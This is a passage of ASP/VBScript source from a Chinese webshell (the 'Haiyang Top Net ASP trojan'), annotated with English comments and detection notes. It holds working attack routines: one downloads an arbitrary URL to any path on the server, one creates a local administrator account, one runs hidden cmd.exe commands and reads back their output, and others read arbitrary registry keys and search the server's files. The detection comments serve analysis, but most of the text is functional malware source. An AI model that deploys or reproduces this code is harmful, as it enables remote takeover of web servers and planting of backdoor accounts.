echo "注册表键值读取(<a href=javascript:showHideMe(regeditInfo);>资料</a>):<hr/>"
echo "<form method=post target=_blank>"
echo "<input type=hidden value=readReg name=theAct>"
echo "<input name=thePath value='HKLM\SYSTEM\CurrentControlSet\Control\ComputerName\ComputerName\ComputerName' size=80>"
echo "<input type=submit value=' 读取 '>"
echo "<span id=regeditInfo style='display:none;'><hr/>"
echo "HKLM\Software\Microsoft\Windows\CurrentVersion\Winlogon\Dont-DisplayLastUserName,REG_SZ,1 {不显示上次登录用户}<br/>"
echo "HKLM\SYSTEM\CurrentControlSet\Control\Lsa\restrictanonymous,REG_DWORD,0 {0=缺省,1=匿名用户无法列举本机用户列表,2=匿名用户无法连接本机IPC$共享}<br/>"
echo "HKLM\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters\AutoShareServer,REG_DWORD,0 {禁止默认共享}<br/>"
echo "HKLM\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters\EnableSharedNetDrives,REG_SZ,0 {关闭网络共享}<br/>"
echo "HKLM\SYSTEM\currentControlSet\Services\Tcpip\Parameters\EnableSecurityFilters,REG_DWORD,1 {启用TCP/IP筛选(所有试配器)}<br/>"
echo "HKLM\SYSTEM\ControlSet001\Services\Tcpip\Parameters\IPEnableRouter,REG_DWORD,1 {允许IP路由}<br/>"
echo "-------以下似乎要看绑定的网卡,不知道是否准确---------<br/>"
echo "HKLM\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{8A465128-8E99-4B0C-AFF3-1348DC55EB2E}\DefaultGateway,REG_MUTI_SZ {默认网关}<br/>"
echo "HKLM\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{8A465128-8E99-4B0C-AFF3-1348DC55EB2E}\NameServer {首DNS}<br/>"
echo "HKLM\SYSTEM\ControlSet001\Services\Tcpip\Parameters\Interfaces\{8A465128-8E99-4B0C-AFF3-1348DC55EB2E}\TCPAllowedPorts {允许的TCP/IP端口}<br/>"
echo "HKLM\SYSTEM\ControlSet001\Services\Tcpip\Parameters\Interfaces\{8A465128-8E99-4B0C-AFF3-1348DC55EB2E}\UDPAllowedPorts {允许的UDP端口}<br/>"
echo "-----------OVER--------------------<br/>"
echo "HKLM\SYSTEM\ControlSet001\Services\Tcpip\Enum\Count {共几块活动网卡}<br/>"
echo "HKLM\SYSTEM\ControlSet001\Services\Tcpip\Linkage\Bind {当前网卡的序列(把上面的替换)}<br/>"
echo "==========================================================<br/>以上资料由kEvin1986提供"
echo "</span>"
echo "</form><hr/>"
echo "<script language=vbs>" & vbNewLine
echo "sub main()" & vbNewLine
echo "base=document.all.text9.value" & vbNewLine
echo "If IsNumeric(base) Then" & vbNewLine
echo "cc=hex(cstr(base))" & vbNewLine
echo "alert(""10进制为""&base)" & vbNewLine
echo "alert(""16进制为""&cc)" & vbNewLine
echo "exit sub" & vbNewLine
echo "end if" & vbNewLine
echo "aa=asc(cstr(base))" & vbNewLine
echo "bb=hex(aa)" & vbNewLine
echo "alert(""10进制为""&aa)" & vbNewLine
echo "alert(""16进制为""&bb)" & vbNewLine
echo "end sub" & vbNewLine
echo "sub main2()" & vbNewLine
echo "If document.all.vars.value<>"""" Then" & vbNewLine
echo "Dim nums,tmp,tmpstr,i" & vbNewLine
echo "nums=document.all.vars.value" & vbNewLine
echo "nums_len=Len(nums)" & vbNewLine
echo "For i=1 To nums_len" & vbNewLine
echo "tmp=Mid(nums,i,1)" & vbNewLine
echo "If IsNumeric(tmp) Then" & vbNewLine
echo "tmp=tmp * 16 * (16^(nums_len-i-1))" & vbNewLine
echo "Else" & vbNewLine
echo "If ASC(UCase(tmp))<65 Or ASC(UCase(tmp))>70 Then" & vbNewLine
echo "alert(""你输入的数值中有非法字符,16进制数只包括1~9及a~f之间的字符,请重新输入。"")" & vbNewLine
echo "exit sub" & vbNewLine
echo "End If" & vbNewLine
echo "tmp=(ASC(UCase(tmp))-55) * (16^(nums_len-i))" & vbNewLine
echo "End If" & vbNewLine
echo "tmpstr=tmpstr+tmp" & vbNewLine
echo "Next" & vbNewLine
echo "alert(""转换的10进制为:""&tmpstr&""其字符值为:""&chr(tmpstr))" & vbNewLine
echo "End If" & vbNewLine
echo "end sub" & vbNewLine
echo "</script>" & vbNewLine
echo "Powered By Marcos 2005.02"
End Sub
' Download-to-disk primitive: fetches Request("theUrl") server-side with
' MSXML2.XMLHTTP and writes the response body to Request("thePath") through
' Adodb.Stream.SaveToFile. Neither the URL nor the destination is validated or
' confined to the web root, so any location the IIS worker identity can write
' is reachable. Unless isDebugMode is set, all errors are swallowed.
' Detection note (review): a single ASP page that instantiates both
' MSXML2.XMLHTTP and Adodb.Stream and calls SaveToFile is a strong webshell
' indicator; on the host the pattern is outbound HTTP from the worker process
' immediately followed by a new file write.
Sub downFromUrl()
If isDebugMode = False Then
On Error Resume Next
End If
Dim Http, theUrl, thePath, stream, fileName, overWrite
theUrl = Request("theUrl")
thePath = Request("thePath")
overWrite = Request("overWrite")
Set stream = Server.CreateObject("Adodb.Stream")
Set Http = Server.CreateObject("MSXML2.XMLHTTP")
' SaveToFile option: anything other than 2 (adSaveCreateOverWrite) is coerced
' to 1 (adSaveCreateNotExist), i.e. existing files are not clobbered by default.
If overWrite <> 2 Then
overWrite = 1
End If
' Synchronous GET; ReadyState 4 means the request completed. On any other
' state the sub exits silently and the stream object is never released.
Http.Open "GET", theUrl, False
Http.Send()
If Http.ReadyState <> 4 Then
Exit Sub
End If
With stream
.Type = 1   ' adTypeBinary: raw bytes, no charset conversion
.Mode = 3   ' adModeReadWrite
.Open
.Write Http.ResponseBody
.Position = 0
.SaveToFile thePath, overWrite
' ADO error 3004 (write to file failed) is presumably the case where thePath
' names a directory: retry with the last URL segment as the file name,
' falling back to index.htm.txt when the URL ends in "/".
If Err.Number = 3004 Then
Err.Clear
fileName = Split(theUrl, "/")(UBound(Split(theUrl, "/")))
If fileName = "" Then
fileName = "index.htm.txt"
End If
thePath = thePath & "\" & fileName
.SaveToFile thePath, overWrite
End If
.Close
End With
' chkErr / alertThenClose are defined elsewhere in the file; whether chkErr
' halts on error cannot be told from here. Backslashes are doubled because the
' path is emitted into a client-side script string.
chkErr(Err)
alertThenClose("文件 " & Replace(thePath, "\", "\\") & " 下载成功!")
Set Http = Nothing
' "Stream" and the declared "stream" are the same variable (VBScript is case-insensitive).
Set Stream = Nothing
End Sub
' Creates a local Windows account via the ADSI WinNT provider and adds it to
' the local Administrators group, then prints its details with getUserInfo
' (defined elsewhere). Runs under the IIS worker identity, so it only succeeds
' when the application pool itself holds local administrator rights.
' Detection note (review): this surfaces as an account-creation event followed
' by a local-group-membership change, both attributed to the web server
' process (typically Security log 4720 then 4732); the literal
' "WinNT://./Administrators,group" is a stable string for file signatures.
Sub AddUser(strUser, strPassword)
If isDebugMode = False Then
On Error Resume Next
End If
Dim computer, theUser, theGroup
Set computer = Getobject("WinNT://.")
Set theGroup = GetObject("WinNT://./Administrators,group")
Set theUser = computer.Create("User", strUser)
' Password is set on the in-memory object; SetInfo commits the account.
theUser.SetPassword(strPassword)
chkErr(Err)
theUser.SetInfo
chkErr(Err)
theGroup.Add theUser
chkErr(Err)
Set theUser = Nothing
Set computer = Nothing
Set theGroup = Nothing
echo getUserInfo(strUser)
End Sub
' Reads an arbitrary registry value named by Request("thePath") through the
' WScript.Shell instance "ws" (created elsewhere in the file) and echoes it.
' Array results (e.g. REG_MULTI_SZ / REG_BINARY) are printed one <li> per
' element; scalars as a single <li>. There is no restriction on hive or key,
' and the value is emitted without HTML encoding.
Sub readReg()
If isDebugMode = False Then
On Error Resume Next
End If
Dim i, thePath, theArray
thePath = Request("thePath")
' echo thePath & "<br/>"
theArray = ws.RegRead(thePath)
If IsArray(theArray) Then
For i = 0 To UBound(theArray)
echo "<li>" & theArray(i)
Next
Else
echo "<li>" & theArray
End If
' Any RegRead failure (missing key, access denied) only surfaces here.
chkErr(Err)
End Sub
' Renders the main menu of this webshell (self-titled 海阳顶端网ASP木马,
' literally "Haiyang Top Net ASP trojan"). Each entry links back to the same
' script with a pageName (and optionally theAct) query parameter that is
' dispatched elsewhere in the file. Static HTML only; no server-side action here.
' Detection note (review): the title string and the pageName values
' (WsCmdRun, SaCmdRun, FsoFileExplorer, MsDataBase, TxtSearcher, ...) are
' stable tokens for file-content signatures and for web-log hunting on the
' query string.
Sub PageList()
showTitle("功能模块列表")
' All menu links open in a new window.
echo "<base target=_blank>"
echo "海阳顶端网ASP木马@2006α<hr/>"
echo "<ol><li><a href='?pageName=ServiceList'>系统服务信息</a></li>"
echo "<br/>"
echo "<li><a href='?pageName=infoAboutSrv'>服务器相关数据<br/>("
echo "<a href='?pageName=infoAboutSrv&theAct=getSrvInfo'>系统参数</a>,"
echo "<a href='?pageName=infoAboutSrv&theAct=getSrvDrvInfo'>系统磁盘</a>,"
echo "<a href='?pageName=infoAboutSrv&theAct=getSiteRootInfo'>站点文件夹</a>,"
echo "<a href='?pageName=infoAboutSrv&theAct=getTerminalInfo'>终端端口&自动登录)</a></li>"
echo "<br/>"
echo "<li><a href='?pageName=objOnSrv'>服务器组件探针</a></li>"
echo "<br/>"
echo "<li><a href='?pageName=userList'>系统用户及用户组信息</a></li>"
echo "<br/>"
echo "<li><a href='?pageName=CSInfo'>客户端服务器交互信息</a></li>"
echo "<br/>"
echo "<li><a href='?pageName=WsCmdRun'>WScript.Shell程序运行器</a></li>"
echo "<br/>"
echo "<li><a href='?pageName=SaCmdRun'>Shell.Application程序运行器</a></li>"
echo "<br/>"
echo "<li><a href='?pageName=FsoFileExplorer'>FSO文件浏览操作器</a></li>"
echo "<br/>"
echo "<li><a href='?pageName=AppFileExplorer'>Shell.Application文件浏览操作器</a></li>"
echo "<br/>"
echo "<li><a href='?pageName=MsDataBase'>微软数据库查看/操作器</a></li>"
echo "<br/>"
echo "<li><a href='?pageName=TxtSearcher'>文本文件搜索器</a></li>"
echo "<br/>"
echo "<li><a href='?pageName=OtherTools'>一些零碎的小东西</a></li>"
echo "<br/></ol>"
echo "<hr/>Powered By Marcos 2005.02"
End Sub
' Program-execution page backed by Shell.Application.ShellExecute on the
' object "sa" (created elsewhere in the file). Two request-driven actions:
'   theAct=doAct      launch appName (default cmd.exe) with appArgs in appPath,
'                     show-window state 0 (hidden); for cmd.exe the arguments
'                     are forced to begin with "/c".
'   theAct=readResult stream back the file at aspPath (the capture file the
'                     "回显" button appends as "> <aspPath>") and end the response.
' Otherwise the form is rendered. Request values are reflected through
' HtmlEncode here, unlike several sibling pages.
' Detection note (review): the host-side artifacts are the IIS worker process
' spawning cmd.exe (or another program) through ShellExecute, and a temp file
' written by that child and then read back by the same ASP page moments later;
' aspPath and the hidden-window argument are the tells in the page itself.
Sub PageSaCmdRun()
If isDebugMode = False Then
On Error Resume Next
End If
Dim theFile, thePath, theAct, appPath, appName, appArgs
showTitle("Shell.Application命令行操作")
theAct = Trim(Request("theAct"))
appPath = Trim(Request("appPath"))
thePath = Trim(Request("thePath"))
appName = Trim(Request("appName"))
appArgs = Trim(Request("appArgs"))
If theAct = "doAct" Then
If appName = "" Then
appName = "cmd.exe"
End If
' Normalise the working directory to end with a backslash.
If appPath <> "" And Right(appPath, 1) <> "\" Then
appPath = appPath & "\"
End If
' cmd.exe always gets a "/c" prefix so the shell exits after the command.
If LCase(appName) = "cmd.exe" And appArgs <> "" Then
If LCase(Left(appArgs, 2)) <> "/c" Then
appArgs = "/c " & appArgs
End If
Else
If LCase(appName) = "cmd.exe" And appArgs = "" Then
appArgs = "/c "
End If
End If
' ShellExecute(file, arguments, directory, operation, show); show = 0 hides the window.
sa.ShellExecute appName, appArgs, appPath, "", 0
chkErr(Err)
End If
If theAct = "readResult" Then
Err.Clear
' Primary read via Adodb.Stream helper; falls back to FSO if that raised.
' encode, streamLoadFromFile, fso and aspPath are defined elsewhere in the file.
echo encode(streamLoadFromFile(aspPath))
If Err Then
Set theFile = fso.OpenTextFile(aspPath)
echo encode(theFile.ReadAll())
Set theFile = Nothing
End If
Response.End
End If
' Form: the iframe is (re)loaded by the client-side wsLoadIFrame() 3.9 s after
' load, which is how the capture file is displayed without a full page refresh.
echo "<style>body{margin:8;border:none;background-color:buttonface;}</style>"
echo "<body onload=""document.forms[0].appArgs.focus();setTimeout('wsLoadIFrame();', 3900);"">"
echo "<form method=post onSubmit='this.Submit.disabled=true'>"
echo "<input type=hidden name=theAct value=doAct>"
echo "<input type=hidden name=aspPath value=""" & HtmlEncode(aspPath) & """>"
echo "所在路径: <input name=appPath type=text id=appPath value=""" & HtmlEncode(appPath) & """ size=62><br/>"
echo "程序文件: <input name=appName type=text id=appName value=""" & HtmlEncode(appName) & """ size=62> "
echo "<input type=button name=Submit4 value=' 回显 ' onClick=""this.form.appArgs.value+=' > '+this.form.aspPath.value;""><br/> "
echo "命令参数: <input name=appArgs type=text id=appArgs value=""" & HtmlEncode(appArgs) & """ size=62> "
echo "<input type=submit name=Submit value=' 运行 '><br/>"
echo "<hr/>注: 只有命令行程序在CMD.EXE运行环境下才可以进行临时文件回显(利用"">""符号),其它程序只能执行不能回显.<br/>"
echo " 由于命令执行时间同网页刷新时间不同步,所以有些执行时间长的程序结果需要手动刷新下面的iframe才能得到.回显后记得删除临时文件.<hr/>"
echo "<iframe id=cmdResult style='width:100%;height:78%;'>"
echo "</iframe>"
echo "</form>"
echo "</body>"
End Sub
' Enumerates Windows services through the ADSI WinNT provider
' (objComputer.Filter = Array("Service")) and prints, per service: name,
' display name, start type (getStartType, defined elsewhere), running state
' via Shell.Application.IsServiceRunning, logon account, description (read
' from the registry by getServiceDsc) and the binary path with arguments.
' "sa" is declared locally here, independent of any global of that name.
' Note: On Error Resume Next is only enabled after the two object creations,
' so a failing GetObject / CreateObject is not suppressed even in non-debug mode.
Sub PageServiceList()
Dim sa, objService, objComputer
showTitle("系统服务信息查看")
Set objComputer = GetObject("WinNT://.")
Set sa = Server.CreateObject("Shell.Application")
objComputer.Filter = Array("Service")
echo "<ol>"
If isDebugMode = False Then
On Error Resume Next
End If
For Each objService In objComputer
echo "<li>" & objService.Name & "</li><hr/>"
echo "<ol>服务名称: " & objService.Name & "<br/>"
echo "显示名称: " & objService.DisplayName & "<br/>"
echo "启动类型: " & getStartType(objService.StartType) & "<br/>"
echo "运行状态: " & sa.IsServiceRunning(objService.Name) & "<br/>"
' Status / ServiceType output is disabled in the original and left as-is.
' echo "当前状态: " & objService.Status & "<br/>"
' echo "服务类型: " & objService.ServiceType & "<br/>"
echo "登录身份: " & objService.ServiceAccountName & "<br/>"
echo "服务描述: " & getServiceDsc(objService.Name) & "<br/>"
echo "文件路径及参数: " & objService.Path
echo "</ol><hr/>"
Next
echo "</ol><hr/>Powered By Marcos 2005.02"
' objComputer is not released explicitly; only sa is.
Set sa = Nothing
End Sub
' Returns the "Description" value of a service from
' HKLM\SYSTEM\CurrentControlSet\Services\<strService> via WScript.Shell.RegRead.
' A fresh WScript.Shell is created and released on every call. strService is
' concatenated into the key path unchanged; a missing value raises a RegRead
' error that the caller's On Error Resume Next (if active) absorbs.
Function getServiceDsc(strService)
Dim ws
Set ws = Server.CreateObject("WScript.Shell")
getServiceDsc = ws.RegRead("HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\" & strService & "\Description")
Set ws = Nothing
End Function
' File-search page. Two forms post back with theAct=fsoSearch (FileSystemObject
' walk via searchFolder below) or theAct=saSearch (appSearchIt, defined
' elsewhere). thePath defaults to the site root (Server.MapPath("\")) and the
' script timeout is raised to 5000 s so a full recursive walk can complete;
' output is buffered and flushed per directory by searchFolder.
' Both forms reuse name=form1 and the same input ids (thePath, keyword), so
' client-side lookups by name/id resolve to the first form only.
' Reflected values go through HtmlEncode.
Sub PageTxtSearcher()
Response.Buffer = True
Server.ScriptTimeOut = 5000
Dim keyword, theAct, thePath, theFolder
theAct = Request("theAct")
keyword = Trim(Request("keyword"))
thePath = Trim(Request("thePath"))
showTitle("文本文件搜索器")
If thePath = "" Then
thePath = Server.MapPath("\")
End If
echo "FSO文件搜索:"
echo "<hr/>"
echo "<form name=form1 method=post action=?pageName=TxtSearcher&theAct=fsoSearch onsubmit=this.Submit.disabled=true>"
echo "路径: <input name=thePath type=text value=""" & HtmlEncode(thePath) & """ id=thePath size=61><br/>"
echo "关键字: <input name=keyword type=text value=""" & HtmlEncode(keyword) & """ id=keyword size=60>"
echo "<input type=submit name=Submit value=给我搜>"
echo "</form>"
echo "<hr/>"
echo "Shell.Application & Adodb.Stream文件搜索:"
echo "<hr/>"
echo "<form name=form1 method=post action=?pageName=TxtSearcher&theAct=saSearch onsubmit=this.Submit2.disabled=true>"
echo "路径: <input name=thePath type=text value=""" & HtmlEncode(thePath) & """ id=thePath size=61><br/>"
echo "关键字: <input name=keyword type=text value=""" & HtmlEncode(keyword) & """ id=keyword size=60>"
echo "<input type=submit name=Submit2 value=给我搜>"
echo "</form>"
echo "<hr/>"
' No On Error Resume Next in this sub: an invalid thePath makes fso.GetFolder
' raise and abort the page. "fso" is created elsewhere in the file.
If theAct = "fsoSearch" And keyword <> "" Then
Set theFolder = fso.GetFolder(thePath)
Call searchFolder(theFolder, keyword)
Set theFolder = Nothing
End If
If theAct = "saSearch" And keyword <> "" Then
Call appSearchIt(thePath, keyword)
End If
echo "<hr/>Powered By Marcos 2005.02"
End Sub
' Recursive FSO directory walk used by the fsoSearch action.
' For every file in "folder": prints a link (fileLink, defined elsewhere) when
' the keyword "str" occurs in the file name, case-insensitively; for files
' whose extension is asp, asa, cer or cdx it additionally searches the content
' with searchFile (defined below) and prints a link carrying the matched title.
' Flushes the response after each directory, then recurses into subfolders.
' Arguments: folder - FSO Folder object; str - search keyword.
Sub searchFolder(folder, str)
Dim ext, title, theFile, theFolder
For Each theFile In folder.Files
' Extension = text after the last "."; a path with no dot yields the whole
' path here, which simply fails the extension test below.
ext = LCase(Split(theFile.Path, ".")(UBound(Split(theFile.Path, "."))))
If InStr(LCase(theFile.Name), LCase(str)) > 0 Then
echo fileLink(theFile, "")
End If
If ext = "asp" Or ext = "asa" Or ext = "cer" Or ext = "cdx" Then
' "title" is an output parameter filled by searchFile.
If searchFile(theFile, str, title, "fso") Then
echo fileLink(theFile, title)
End If
End If
Next
Response.Flush()
For Each theFolder In folder.subFolders
searchFolder theFolder, str
Next
end sub
Function searchFile(f, s, title, metho